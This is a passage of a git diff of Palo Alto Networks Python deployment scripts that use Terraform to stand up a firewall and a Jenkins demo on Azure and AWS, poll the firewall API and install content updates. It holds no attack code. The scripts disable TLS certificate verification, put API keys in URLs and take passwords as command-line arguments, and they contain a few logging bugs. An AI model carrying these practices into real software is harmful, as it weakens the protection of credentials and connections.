+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+    # Send command to fw and see if it times out or we get a response
+    logger.info("Sending command 'show chassis status' to firewall")
+    try:
+        response = requests.get(url, verify=False, timeout=10)
+        response.raise_for_status()
+    except requests.exceptions.Timeout as fwdownerr:
+        logger.debug("No response from FW. So maybe not up!")
+        return 'no'
+        # sleep and check again?
+    except requests.exceptions.HTTPError as fwstartgerr:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        raise_for_status() throws HTTPError for error responses
+        '''
+        logger.infor("Http Error: {}: ".format(fwstartgerr))
+        return 'cmd_error'
+    except requests.exceptions.RequestException as err:
+        logger.debug("Got RequestException response from FW. So maybe not up!")
+        return 'cmd_error'
+    else:
+        logger.debug("Got response to 'show chassis status' {}".format(response))
+
+        resp_header = ET.fromstring(response.content)
+        logger.debug('Response header is {}'.format(resp_header))
+
+        if resp_header.tag != 'response':
+            logger.debug("Did not get a valid 'response' string...maybe a timeout")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'error':
+            logger.debug("Got an error for the command")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'success':
+            # The fw responded with a successful command execution. So is it ready?
+            for element in resp_header:
+                if element.text.rstrip() == 'yes':
+                    logger.info("FW Chassis is ready to accept configuration and connections")
+                    return 'yes'
+                else:
+                    logger.info("FW Chassis not ready, still waiting for dataplane")
+                    time.sleep(10)
+                    return 'almost'
+
+
+def update_status(key, value):
+    """
+    For tracking purposes.  Write responses to file.
+    :param key:
+    :param value:
+    :return:
+    """
+    global status_output
+
+    if type(status_output) is not dict:
+        logger.info('Creating new status_output object')
+        status_output = dict()
+
+    if key is not None and value is not None:
+        status_output[key] = value
+
+    # write status to file to future tracking
+    write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+    """
+    Writes the deployment state to a dict and outputs to file for status tracking
+    """
+    try:
+        message_json = json.dumps(message_dict)
+        with open('deployment_status.json', 'w+') as dpj:
+            dpj.write(message_json)
+
+    except ValueError as ve:
+        logger.error('Could not write status file!')
+        print('Could not write status file!')
+        sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+    """
+    Generate a unique share name to avoid overlaps in shared infra
+    :param share_prefix:
+    :param account_name:
+    :param account_key:
+    :return:
+    """
+
+    # FIXME - Need to remove hardcoded directoty link below
+
+    d_dir = './WebInDeploy/bootstrap'
+    share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+    print('using share_name of: {}'.format(share_name))
+
+    # archive_file_path = _create_archive_directory(files, share_prefix)
+
+    try:
+        # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+        s = requests.Session()
+        s.verify = False
+
+        file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+        # print(file_service)
+        if not file_service.exists(share_name):
+            file_service.create_share(share_name)
+
+        for d in ['config', 'content', 'software', 'license']:
+            print('creating directory of type: {}'.format(d))
+            if not file_service.exists(share_name, directory_name=d):
+                file_service.create_directory(share_name, d)
+
+            # FIXME - We only handle bootstrap files.  May need to handle other dirs
+
+            if d == 'config':
+                for filename in os.listdir(d_dir):
+                    print('creating file: {0}'.format(filename))
+                    file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+    except AttributeError as ae:
+        # this can be returned on bad auth information
+        print(ae)
+        return "Authentication or other error creating bootstrap file_share in Azure"
+
+    except AzureException as ahe:
+        print(ahe)
+        return str(ahe)
+    except ValueError as ve:
+        print(ve)
+        return str(ve)
+
+    print('all done')
+    return share_name
+
+
+def getServerStatus(IP):
+    """
+    Gets the server status by sending an HTTP request and checking for a 200 response code
+
+    """
+    global gcontext
+
+    call = ("http://" + IP + "/")
+    logger.info('URL request is {}'.format(call))
+    # Send command to fw and see if it times out or we get a response
+    count = 0
+    max_count = 15
+    while True:
+        if count < max_count:
+            try:
+                count = count + 1
+                r = send_request(call)
+            except DeployRequestException as e:
+                logger.debug("Got Invalid response".format(e))
+            else:
+                logger.info('Jenkins Server responded with HTTP 200 code')
+                return 'server_up'
+        else:
+            break
+    return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+    """
+    Handles terraform operations and returns variables in outputs.tf as a dict.
+    :param working_dir: Directory that contains the tf files
+    :param vars: Additional variables passed in to override defaults equivalent to -var
+    :param description: Description of the deployment for logging purposes
+    :return:    return_code - 0 for success or other for failure
+                outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+    """
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+
+    start_time = time.asctime()
+    print('Starting Deployment at {}\n'.format(start_time))
+
+    # Create Bootstrap
+
+    tf = Terraform(working_dir=working_dir)
+
+    tf.cmd('init')
+    if run_plan:
+
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+                                            skip_plan = True, **kwargs)
+    outputs = tf.output()
+
+    logger.debug('Got Return code {} for deployment of  {}'.format(return_code, description))
+
+    return (return_code, outputs)
+
+
+def main(username, password, rg_name, azure_region):
+
+    """
+    Main function
+    :param username:
+    :param password:
+    :param rg_name: Resource group name prefix
+    :param azure_region: Region
+    :return:
+    """
+    username = username
+    password = password
+
+    WebInBootstrap_vars = {
+        'RG_Name': rg_name,
+        'Azure_Region': azure_region
+    }
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password,
+        'Azure_Region': azure_region
+    }
+
+    WebInFWConf_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    #
+    return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap')
+
+    if return_code == 0:
+        share_prefix = 'jenkins-demo'
+        resource_group = outputs['Resource_Group']['value']
+        bootstrap_bucket = outputs['Bootstrap_Bucket']['value']
+        storage_account_access_key = outputs['Storage_Account_Access_Key']['value']
+        update_status('web_in_bootstrap_status', 'success')
+    else:
+        logger.info("WebInBootstrap failed")
+        update_status('web_in_bootstap_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+
+    share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+    WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+    WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+    WebInDeploy_vars.update({'RG_Name': resource_group})
+    WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+    WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+    #
+    # Build Infrastructure
+    #
+    #
+
+
+    return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+    update_status('web_in_deploy_output', web_in_deploy_output)
+    if return_code == 0:
+        update_status('web_in_deploy_status', 'success')
+        albDns = web_in_deploy_output['ALB-DNS']['value']
+        fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value']
+        nlbDns = web_in_deploy_output['NLB-DNS']['value']
+        fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+
+        logger.info("Got these values from output of WebInDeploy \n\n")
+        logger.info("AppGateway address is {}".format(albDns))
+        logger.info("Internal loadbalancer address is {}".format(nlbDns))
+        logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+    else:
+        logger.info("WebInDeploy failed")
+        update_status('web_in_deploy_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+    #
+    # Check firewall is up and running
+    #
+    #
+
+    api_key = getApiKey(fwMgtIP, username, password)
+
+    while True:
+        err = getFirewallStatus(fwMgtIP, api_key)
+        if err == 'cmd_error':
+            logger.info("Command error from fw ")
+
+        elif err == 'no':
+            logger.info("FW is not up...yet")
+            # print("FW is not up...yet")
+            time.sleep(60)
+            continue
+
+        elif err == 'almost':
+            logger.info("MGT up waiting for dataplane")
+            time.sleep(20)
+            continue
+
+        elif err == 'yes':
+            logger.info("FW is up")
+            break
+
+    logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+    time.sleep(10)
+    fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+    logger.info("Updating firewall with latest content pack")
+    update_fw(fwMgtIP, api_key)
+
+    #
+    # Configure Firewall
+    #
+    WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+    logger.info("Applying addtional config to firewall")
+
+    return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+
+    if return_code == 0:
+        update_status('web_in_fw_conf', 'success')
+        logger.info("WebInFWConf failed")
+
+    else:
+        logger.info("WebInFWConf failed")
+        update_status('web_in_deploy_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+    logger.info("Commit changes to firewall")
+
+    fw.commit()
+    logger.info("waiting for commit")
+    time.sleep(60)
+    logger.info("waiting for commit")
+
+    #
+    # Check Jenkins
+    #
+
+    logger.info('Checking if Jenkins Server is ready')
+
+    res = getServerStatus(albDns)
+
+    if res == 'server_up':
+        logger.info('Jenkins Server is ready')
+        logger.info('\n\n   ### Deployment Complete ###')
+        logger.info('\n\n   Connect to Jenkins Server at http://{}'.format(albDns))
+    else:
+        logger.info('Jenkins Server is down')
+        logger.info('\n\n   ### Deployment Complete ###')
+
+    # dump out status to stdout
+    print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+    parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    resource_group = args.resource_group
+    azure_region = args.azure_region
+
+    main(username, password, resource_group, azure_region)
diff --git a/aws/Jenkins_proj-master/deploy.py b/aws/Jenkins_proj-master/deploy.py
index ed65e372..9d50e583 100644
--- a/aws/Jenkins_proj-master/deploy.py
+++ b/aws/Jenkins_proj-master/deploy.py
@@ -1,19 +1,25 @@
 #!/usr/bin/env python3
 """
-Paloaltonetworks deploy.py
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 
-This software is provided without support, warranty, or guarantee.
-Use at your own risk.
+# Author: Justin Harris jharris@paloaltonetworks.com
 
 Usage
 
 python deploy.py -u <fwusername> -p'<fwpassword> -k <aws_key> -s <aws_secret> -r <aws_region>
-
-Contents of json dict
-
-{"WebInDeploy": "Success", "WebInFWConf": "Success", "waf_conf": "Success"}
-`"""
-
+"""
 import argparse
 import json
 import logging
@@ -25,16 +31,17 @@
 
 import requests
 import urllib3
+import xmltodict
 
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 from pandevice import firewall
-from pandevice import updater
+from collections import OrderedDict
 from python_terraform import Terraform
 
 gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
 
-logging.basicConfig(level=logging.DEBUG)
+logging.basicConfig(level=logging.INFO)
 logger = logging.getLogger()
 handler = logging.StreamHandler()
 formatter = logging.Formatter('%(levelname)-8s %(message)s')
@@ -47,8 +54,16 @@
 
 
 def send_request(call):
+    """
+    Handles sending requests to API
+    :param call: url
+    :return: Retruns result of call. Will return response for codes between 200 and 400.
+             If 200 response code is required check value in response
+    """
+    headers = {'Accept-Encoding': 'None', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
     try:
-        r = requests.get(call, verify=False, timeout=5)
+        r = requests.get(call, headers=headers, verify=False, timeout=5)
         r.raise_for_status()
     except requests.exceptions.HTTPError as errh:
         '''
@@ -73,148 +88,225 @@ class DeployRequestException(Exception):
     pass
 
 
-def update_fw(fwMgtIP, api_key):
-    # # Download latest applications and threats
+
+def walkdict(dict, match):
+    """
+    Finds a key in a dict or nested dict and returns the value associated with it
+    :param d: dict or nested dict
+    :param key: key value
+    :return: value associated with key
+    """
+    for key, v in dict.items():
+        if key == match:
+            jobid = v
+            return jobid
+        elif isinstance(v, OrderedDict):
+            found = walkdict(v, match)
+            if found is not None:
+                return found
+
+
+
+def check_pending_jobs(fwMgtIP, api_key):
     type = "op"
-    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    cmd = "<show><jobs><all></all></jobs></show>"
     call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    key = 'result'
+    jobs = ''
     try:
         r = send_request(call)
+        logger.info('Got response {} to request for content upgrade '.format(r.text))
+        dict = xmltodict.parse(r.text)
+        if isinstance(dict, OrderedDict):
+            jobs = walkdict(dict, key)
+        else:
+            logger.info('Didnt get a dict')
+        if not jobs:
+            # No jobs pending
+            return False
+        else:
+            # Jobs pending
+            return True
+
     except:
-        DeployRequestException
-        logger.debug("failed to get jobid this time.  Try again")
-    else:
-        tree = ET.fromstring(r.text)
-        jobid = tree[0][1].text
-        print("Download latest Applications and Threats update - " + str(jobid))
+        logger.info('Didnt get response to check pending jobs')
+        return False
+
+
+def update_fw(fwMgtIP, api_key):
+    """
+    Applies latest AppID, Threat and AV updates to firewall after launch
+    :param fwMgtIP: Firewall management IP
+    :param api_key: API key
+
+    """
+    # # Download latest applications and threats
+
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
     completed = 0
     while (completed == 0):
-        time.sleep(10)
+        time.sleep(45)
         call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
         try:
             r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
         except:
             DeployRequestException
             logger.debug("failed to get jobid this time.  Try again")
         else:
             tree = ET.fromstring(r.text)
-
-            if (tree[0][0][5].text == 'FIN'):
-                logger.debug("APP+TP download Status - " + str(tree[0][0][5].text))
-                completed = 1
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete ")
+                        completed = 1
+                    print("Download latest Applications and Threats update")
+                    status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
             else:
-                print("Download latest Applications and Threats update")
-                status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
-                    tree[0][0][12].text) + "% complete"
-                print('{0}\r'.format(status))
+                logger.info('Unable to determine job status')
+                completed = 1
 
-    # Install latest applications and threats without committing
-    time.sleep(1)
+    # Install latest content update
     type = "op"
     cmd = "<request><content><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></content></request>"
     call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    try:
-        r = send_request(call)
-    except:
-        DeployRequestException
-        logger.debug("Requested content install but got response{}".format(r))
-    else:
-        print("request for content upgrade response was {}".format(r.text))
-        tree = ET.fromstring(r.text)
-        if tree.attrib['status'] == 'success':
-            '''
-            Check that we were able to schedule the install
-            Valid response would contain
-            <response status="success">
-            Invalid response would contain
-            <response status="error">
-            '''
-            jobid = tree[0][1].text
-            print("Install latest Applications and Threats update - " + str(jobid))
-
-            completed = 0
-            while (completed == 0):
-                time.sleep(10)
-                call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
-                    fwMgtIP, jobid, api_key)
-                r = send_request(call)
-                tree = ET.fromstring(r.text)
+    getjobid = 0
+    jobid = ''
+    key = 'job'
 
-                if (tree[0][0][5].text == 'FIN'):
-                    logger.debug("APP+TP install Status - " + str(tree[0][0][5].text) + " " + str(
-                        tree[0][0][12].text) + "% complete")
-                    completed = 1
-                else:
-                    print("tree value {}".format(tree[0][0][5].text))
-                    status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str(
-                        tree[0][0][12].text) + "% complete"
-                    print('{0}\r'.format(status))
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
         else:
-            logger.debug("Unable to schedule install")
-
-    # download latest anti-virus update
-    type = "op"
-    cmd = "<request><anti-virus><upgrade><download><latest></latest></download></upgrade></anti-virus></request>"
-    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    try:
-        r = send_request(call)
-    except:
-        DeployRequestException
-        logger.debug("Requested AV download but got response{}".format(DeployRequestException))
-    else:
-        tree = ET.fromstring(r.text)
-        jobid = tree[0][1].text
-        logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid)))
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
 
     completed = 0
     while (completed == 0):
-        time.sleep(10)
+        time.sleep(45)
         call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
-        r = send_request(call)
-
-        tree = ET.fromstring(r.text)
-        if (tree[0][0][5].text == 'FIN'):
-            logger.debug(
-                "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete")
-            completed = 1
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
         else:
-            status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
-            print('{0}\r'.format(status))
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP Install Complete ")
+                        completed = 1
+                    print("Install latest Applications and Threats update")
+                    status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
 
-    # install latest anti-virus update without committing
+
+    # Download latest anti-virus update without committing
+    getjobid = 0
+    jobid = ''
     type = "op"
-    cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
-    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    r = send_request(call)
-    tree = ET.fromstring(r.text)
-    if tree.attrib['status'] == 'success':
-        '''
-        Check that we were able to schedule the install
-        Valid response would contain
-        <response status="success">
-        Invalid response would contain
-        <response status="error">
-        '''
-        jobid = tree[0][1].text
-        print("Install latest Anti-Virus update - " + str(jobid))
-
-        completed = 0
-        while (completed == 0):
-            time.sleep(10)
-            call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
-                fwMgtIP, jobid, api_key)
+    cmd = "<request><anti-virus><upgrade><download><latest></latest></download></upgrade></anti-virus></request>"
+    key = 'job'
+    while getjobid == 0:
+        try:
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
             r = send_request(call)
-            tree = ET.fromstring(r.text)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
 
-            if (tree[0][0][5].text == 'FIN'):
-                logger.debug(
-                    "AV install Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete")
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+            fwMgtIP, jobid, api_key)
+        r = send_request(call)
+        tree = ET.fromstring(r.text)
+        logger.debug('Got response for show job {}'.format(r.text))
+        if tree.attrib['status'] == 'success':
+            try:
+                if (tree[0][0][5].text == 'FIN'):
+                    logger.info("AV install Status Complete ")
+                    completed = 1
+                else:
+                    status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+            except:
+                logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
                 completed = 1
-            else:
-                status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
-                print('{0}\r'.format(status))
-    else:
-        logger.debug("Unable to schedule install")
+        else:
+            logger.info('Unable to determine job status')
+            completed = 1
 
 
 def getApiKey(hostname, username, password):
@@ -232,8 +324,8 @@ def getApiKey(hostname, username, password):
 
 
         except DeployRequestException as updateerr:
-            logger.info("No response from FW. Wait 20 secs before retry")
-            time.sleep(10)
+            logger.info("No response from FW. Wait 30 secs before retry")
+            time.sleep(30)
             continue
 
         else:
@@ -243,50 +335,6 @@ def getApiKey(hostname, username, password):
             return api_key
 
 
-# def getFirewallStatus(fwMgtIP, api_key):
-#     """
-#     Gets the firewall status by sending the API request show chassis status.
-#     :param fwMgtIP:  IP Address of firewall interface to be probed
-#     :param api_key:  Panos API key
-#     """
-#     global gcontext
-#
-#     cmd = urllib.request.Request(
-#         "https://" + fwMgtIP + "/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=" + api_key)
-#     # Send command to fw and see if it times out or we get a response
-#     logger.info("Sending command 'show chassis status' to firewall")
-#     try:
-#         response = urllib.request.urlopen(cmd, data=None, context=gcontext, timeout=5).read()
-#
-#     except urllib.error.URLError:
-#         logger.debug("No response from FW. So maybe not up!")
-#         return 'no'
-#         # sleep and check again?
-#     else:
-#         logger.debug("Got response to 'show chassis status' {}".format(response))
-#
-#     resp_header = ET.fromstring(response)
-#     logger.debug('Response header is {}'.format(resp_header))
-#
-#     if resp_header.tag != 'response':
-#         logger.debug("Did not get a valid 'response' string...maybe a timeout")
-#         return 'cmd_error'
-#
-#     if resp_header.attrib['status'] == 'error':
-#         logger.debug("Got an error for the command")
-#         return 'cmd_error'
-#
-#     if resp_header.attrib['status'] == 'success':
-#         # The fw responded with a successful command execution. So is it ready?
-#         for element in resp_header:
-#             if element.text.rstrip() == 'yes':
-#                 logger.info("FW Chassis is ready to accept configuration and connections")
-#                 return 'yes'
-#             else:
-#                 logger.info("FW Chassis not ready, still waiting for dataplane")
-#                 time.sleep(10)
-#                 return 'almost'
-
 def getFirewallStatus(fwIP, api_key):
     fwip = fwIP
 
@@ -398,7 +446,53 @@ def getServerStatus(IP):
     return 'server_down'
 
 
-def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_bucket):
+def apply_tf(working_dir, vars, description):
+    """
+    Handles terraform operations and returns variables in outputs.tf as a dict.
+    :param working_dir: Directory that contains the tf files
+    :param vars: Additional variables passed in to override defaults equivalent to -var
+    :param description: Description of the deployment for logging purposes
+    :return:    return_code - 0 for success or other for failure
+                outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+    """
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+
+    start_time = time.asctime()
+    print('Starting Deployment at {}\n'.format(start_time))
+
+    # Create Bootstrap
+
+    tf = Terraform(working_dir=working_dir)
+
+    tf.cmd('init')
+    if run_plan:
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code, stdout, stderr = tf.apply(vars=vars, capture_output=capture_output,
+                                           skip_plan=True, **kwargs)
+    outputs = tf.output()
+
+    logger.debug('Got Return code {} for deployment of  {}'.format(return_code, description))
+
+    return (return_code, outputs)
+
+
+def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair):
     username = username
     password = password
     aws_access_key = aws_access_key
@@ -407,20 +501,14 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
     ec2_key_pair = ec2_key_pair
     albDns = ''
     nlbDns = ''
-    fwMgt = ''
-
-    default_vars = {
-        'aws_access_key': aws_access_key,
-        'aws_secret_key': aws_secret_key,
-        'aws_region': aws_region
-    }
+    fwMgtIP = ''
 
     WebInDeploy_vars = {
         'aws_access_key': aws_access_key,
         'aws_secret_key': aws_secret_key,
         'aws_region': aws_region,
         'ServerKeyName': ec2_key_pair,
-        'bootstrap_s3bucket': bootstrap_bucket
+        # 'bootstrap_s3bucket': bootstrap_bucket
     }
 
     waf_conf_vars = {
@@ -437,111 +525,74 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key
         'aws_secret_key': aws_secret_key,
         'aws_region': aws_region,
         'ServerKeyName': ec2_key_pair,
-        'mgt-ipaddress-fw1': fwMgt,
+        'mgt-ipaddress-fw1': fwMgtIP,
         'nlb-dns': nlbDns,
         'username': username,
         'password': password
     }
 
-    # Set run_plan to TRUE is you wish to run terraform plan before apply
-    run_plan = False
-    kwargs = {"auto-approve": True}
-
-    # Class Terraform uses subprocess and setting capture_output to True will capture output
-    capture_output = kwargs.pop('capture_output', False)
-
-    if capture_output is True:
-        stderr = subprocess.PIPE
-        stdout = subprocess.PIPE
-    else:
-        # if capture output is False, then everything will essentially go to stdout and stderrf
-        stderr = sys.stderr
-        stdout = sys.stdout
-        start_time = time.asctime()
-        print(f'Starting Deployment at {start_time}\n')
+    # # Set run_plan to TRUE is you wish to run terraform plan before apply
 
-    # Build Infrastructure
-
-    tf = Terraform(working_dir='./WebInDeploy')
-
-    tf.cmd('init')
-    if run_plan:
-        # print('Calling tf.plan')
-        tf.plan(capture_output=False, var=WebInDeploy_vars)
+    run_plan = False
 
-    return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
-                                            **kwargs)
+    kwargs = {"auto-approve": True}
 
-    web_in_deploy_output = tf.output()
+    #
+    return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
 
-    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
 
     # update_status('web_in_deploy_stdout', stdout)
     update_status('web_in_deploy_output', web_in_deploy_output)
 
-    if return_code1 != 0:
+    if return_code == 0:
+        update_status('web_in_deploy_status', 'success')
+        albDns = web_in_deploy_output['ALB-DNS']['value']
+        fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+        nlbDns = web_in_deploy_output['NLB-DNS']['value']
+        fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+        logger.info("Got these values from output of WebInDeploy \n\n")
+        logger.info("AppGateway address is {}".format(albDns))
+        logger.info("Internal loadbalancer address is {}".format(nlbDns))
+        logger.info("Firewall Mgt address is {}".format(fwMgtIP))
+
+    else:
